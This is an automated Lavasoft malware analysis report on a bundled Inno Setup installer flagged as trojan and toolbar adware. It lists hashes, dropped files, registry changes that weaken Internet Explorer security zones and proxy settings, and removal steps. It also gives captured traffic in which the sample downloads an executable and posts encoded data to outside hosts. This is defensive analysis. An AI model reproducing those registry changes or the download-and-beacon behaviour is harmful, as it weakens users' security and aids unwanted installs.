Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, WebToolbar.Win32.InstallCore.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Installer, WebToolbar
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 358948ff6cc660e34b5149632f6618d7
SHA1: 6f4ea55048751b242d6ff67bdd8034984a457661
SHA256: f47c9a59bd7c3e3f0da5d108090f0cd3949b4e99afe387ff675b51d4e9b30941
SSDeep: 24576:YGvm6h1GBy7zQcKwRSr5NOdJSq2YiDDNFH:YGd1ey49wRSidZEDL
Size: 806000 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):No processes have been created.The Installer injects its code into the following process(es):
%original file name%.exe:772
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:772 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ICReinstall_%original file name%.exe (3879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE.part (1523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PL.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Progress.png (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\text-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\UA.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close.png (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\ProgressBar.png (958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close_Hover.png (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\DE.locale (4 bytes)
%Documents and Settings%\%current user%\Desktop\Continue Media Player Installation.lnk (1 bytes)
%Program Files%\is833625.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Logo.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\FR.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\dat\upd.DAT (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\IT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\BG.png (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\main.css (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\RU.locale (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\EN.locale (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE (251679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\ie6_main.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (8 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (0 bytes)
%Program Files%\is833625.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (0 bytes)
Registry activity
The process %original file name%.exe:772 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC CD 99 73 AF 7C 53 7E 0D E4 71 81 1D D4 FC 0B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
8beb1a5bc7ef0e2a2d7eb44b74a2ade7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is1242154493\834030_stp.EXE |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ICReinstall_%original file name%.exe (3879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE.part (1523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PL.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Progress.png (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\text-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\UA.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close.png (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\ProgressBar.png (958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close_Hover.png (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\DE.locale (4 bytes)
%Documents and Settings%\%current user%\Desktop\Continue Media Player Installation.lnk (1 bytes)
%Program Files%\is833625.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Logo.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\FR.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\dat\upd.DAT (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\IT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\BG.png (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\main.css (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\RU.locale (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\EN.locale (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\ie6_main.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (8 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments: This installation was built with Inno Setup.
Language: Language Neutral
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: This installation was built with Inno Setup.Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 37732 | 37888 | 4.60255 | ee388f246260667e0b4dd45d4df25909 |
DATA | 45056 | 588 | 1024 | 1.8986 | d5ea23d4ecf110fd2591314cbaa84278 |
BSS | 49152 | 3720 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2228 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 21228 | 21504 | 3.79482 | 4b1229b62c06d1816aab1b896b5cbf23 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
87626977af079b5b4a2441f44a016f40
e7205d4bacfcf5d725bb76223923c9cb
f67a513a3905af821bdc90e042530388
2a9141cb7a957176f3c30a7650cc5f0e
5844018c91be0f2a6c5705cc1297f62a
38d25300df4055f315f3a816f4bc7813
Network Activity
URLs
URL | IP |
---|---|
hxxp://os.vlc-plugin.com/CM_DS/?v=3.0&c=1852028036 | 52.19.236.195 |
hxxp://d3qor7nx9zb32s.cloudfront.net/exe/vlc-2.1.0-win32.exe | |
hxxp://os2.vlc-plugin.com/Aff-AD/?v=3.0&c=1852028036 | 54.93.97.68 |
hxxp://static.greatappsdownload.com/exe/vlc-2.1.0-win32.exe | 54.192.95.223 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=22425600-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1853049
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:04 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12
Content-Range: bytes 22425600-24278648/24278649
X-Cache: Hit from cloudfront
Via: 1.1 ecc0c6e7bd06eacf696003aa79e1e25a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ufqcGsujrHtUafG1eRcZpsSdnnxBpn3-hAK2zjt8x2d1frnodYRrtQ==
...^......o.......p..D....{v...r.b..8.I.6.?@-.......e...F.G..!.....G........%:.Y.@..K.=.2_{..5.....:T..u...aF..C...AC,>.....L.z...K..p4U....0.......<.r.6L..r.L..U.H..i4W....4.z......'..!......<..y......V.-:vxf..=.D....ec..{V;....N=......~.vu'...V.O'.F.$.71~..j........q..Y=W......O.)..[Di.c.........B..?..zx....Zi.....WT...l~.X.rAHc...Dy..o_-.qk.?b......r.`".y.K....N..5..yB]?.2i........r..D.vMP...q..P!..4...0K.V..J....*....x..../n......6.q...7.:^!".\.?..}.|#Z>. t.o....0........S{lq...6.W.G...E.._..D..SYpJ.?..Z.....~......Yq...!.S....G.<._.*e...M....-..|.[...J....hJWO\.0.QC...Y.<.w...L......zJ6.*N.Dr!.6b.K.U......T .Q..(X......is.u..O$*.p........X..........@|#.[......6.=..1ZE[e..F,b.`.*w....o%...QK.z...9r!R.c..%....a..g.].8.$B.{.O."(.^l.w...N.......v.......j.7.H..].W.i...zh.7.......D.........S..IiO....2.......n ........0..C8w(.@.3 ..`@...<b'I.......3.....H.....Zc~.o..*...e.G.s...'....x&h.....A...W....G...._..'k....t...o.1..k..#...........&....ST....9P......1..I ..[.#.?z.....u..j..XC....*.;...........ll...fc&...T.QD..".u/d....H{.~...KU..=cW..>g.'K.....X....."....~9.r..m.e.........87J......S.x...@.....^.c..Q.......J...o..r.[c5 ..:.sN..7.F.....X4...r...0..p!...S....m.....*..e%...G2...@.E.G_...}$?.4hf"7_..9...\..DW._.]....:.;Xp.....].......j.`l......1..........6,.7..~8....E..-.xE...j...).s....kN..........&2.DTP...[.od.........x..fBN.......`d cv..Q..L.4.....C"k$|....Pn.[..o.....m<\.qn......M.y./.%$.V..7hS..:\..._ }.Gj...>..w...U..`.H.<W\Z.D..w.r..../...'.....~.vNK..........y.A.4.1)..DfH
<<< skipped >>>
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=0-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 24278649
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:03 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 0-24278648/24278649
X-Cache: Miss from cloudfront
Via: 1.1 01aba6a110b5612d129a6b912fa21044.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Wxn6qIbTvJ2BBlY8wnhuwBhk9G_OXQZfaHKmEnqEkc5DPNNGeCqZmw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..O.....................P......'C............@..........................p................ ..........................................a...........................................................................................................text...D........................... .0`.data...............................@.0..rdata...#.......$..................@.0@.bss..................................0..idata..............................@.0..ndata...P..........................@.0..rsrc....a.......b..................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F.........{B..H...H.......M..E..5H{B..D$...$....B..M..E.....SS...E...$.D$... .B..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|.B..E..R...D$..E..D$...$....B.....<$....B..E..Q.}.;}...Q....~X........F4..$....B...W..........$.E......E......D$.........B.RR.FX..$.D$.....B..5..B.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..{B.....B...|.......T$...$..QQ.<$....B.S.M..E..D$...$....B.PP1....D
<<< skipped >>>
HEAD /exe/vlc-2.1.0-win32.exe HTTP/1.1
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 24278649
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:03 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 9c639fa8cc4e8890b24d42b79b84df74.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pdVic9yeSQHsP915rZSVdPR-WTSWAZ5l-5usqcKfzq6n3NrwXKKRKQ==
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=12697600-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 11581049
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:04 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 12697600-24278648/24278649
X-Cache: Miss from cloudfront
Via: 1.1 22d1c3da7034c9d974fcbde908eb6a50.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UwXyLQLfhvYvIeEUkyAlRJRJTE0TlqULijCZr1P4Cp7bbE8F0Ha8ZQ==
......r.......c.b.T.{.a.Z...........'.*...h.....%..l.`...qN9.<j.5}.#.......<...)......~]...@......./....&.i.N.yK.0.....N6.*g.......G_........u...0ap.^...%..\...T..` .......SnQ....I.....K.9{...."... [.........<."{...... .......i.T.......w.._..g4.i..@;m...%...u.Aw..A..r.Mr`.'.X.f.6...;l.....EF.[...;k...............o.:H]S...,K..e .9Tf.x.v.....Yh.W..m?._.].u..Qc..u...v.b...XQ..n.?.u.....Kl....RL`...n..4..$.....V.0..6.!*..{X. .3.}.u..W.@.!.t..!..o<.....{:...q0.W....a ...'\.....A.U....,[...@#>...o.]B[ .....%Oh.B........_.iWe..h..H..V aTS.lr.j.pd.. .....u..K(D.l.a"...Z...D...v....&V?.=...@\t"A..s.L.g.....u.l.e).AJ9..&.........j......B.@V.l..o7)..h..W....f.!?..!..G...m...."`A4. S..E... ..g.B....J..fX...Lx...D.f......@....~:q...#.TH....D..........^9n.<F...'...f.........V..@...<JT.=...as...G .....l$...'XA.Wh....c.E.....[CM.>..Dd...dW.`.I%....&....I..Q).....9.8b..ND!M.Uq...}..O;gs.....0.O..#W8.S.r.3<.....[...5.L8^.'.].o...p..O~WI...Zl.a.`(.iXL.7..H1j).pH...6...7.H.$......... k.........o.I..w..|.)M$...)5..-.b(.b.Abz ......W.a.)Z.z....<p....m-ReZ..J@.S.R.X3p.Z2...X{....}u...Y...{....j.i<.............*...R...V...903._.......y..\...VDXT...t.6O......!v...?...r.>.?.g.Y5..pj.......4C..4./B......Z9...:.;...'..f..F"h...f..4...T..X^..!>.~l..../\.J..m.'a<.'..@.$......#......`.........H.r;zQ.x....U..Nf.!.V...pe..... .`.u..2..4..=h...`..7..Z..l.:...r&.z).......3.../..q.....?.F............nP..#.Z...#.y?.f|.O....x .8 f..:.V-..z..x8..i.|v..... .........~.T.;^.=..D......f ...N$.Z.vR^hS...Q...|.'Z
<<< skipped >>>
POST /CM_DS/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
0A0CzutC0HtC0QtC0VtC0NtC0NtC0OtC0RtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0W0VzuyDtFtCtN0W0S0PzutAtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzuzztAtAzyyCyDtN1L1B0A1Q1H1L1GzutCtN0T0KzuzztAtAyBtAyEtN0U0I0DzutDtDtD0CtBzy0F0DyDyD0A0DyB0AtByDtN0S0D0TzutBtDtCyCtDtAtByEtDtDtDzzyEyBzztDyBtN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0M0A0C1V0LzutDtDtD0CtBzy0F0DyDyD0A0DtN0P0E1V0M0O0D0Ezu0D0L0LtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN0R0N1T1H1Pzu1RtOtA0AtOyD0CtAyDzzzyyEzz1O1OyC1R1RyCyCtD1PtAyE1SyDtCyEzyyCtAtB1OyCyCtCzz1QyBtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyDtFtCtN0O0S0S0P0V1P1CzutAtN0O0S2VyCyEzutDtN0P0P0Nzu1B1T1G1Q1S1F2V1V1B2X1RtF1P2V1PtN0M1P1H0P1M0AzutBzzyBtN0M1P1H0P1M0TzuyDtCtCtN0M1P1H0V1L1C0AzutCzyyByEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1H1P1Q1L1T1V1E1I1T2U1P1C
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:02 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
HTTP/1.1 404 Not Found..Content-Type: text/html..Date: Wed, 23 Mar 2016 22:12:02 GMT..Server: nginx..Content-Length: 0..Connection: keep-alive......
POST /CM_DS/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
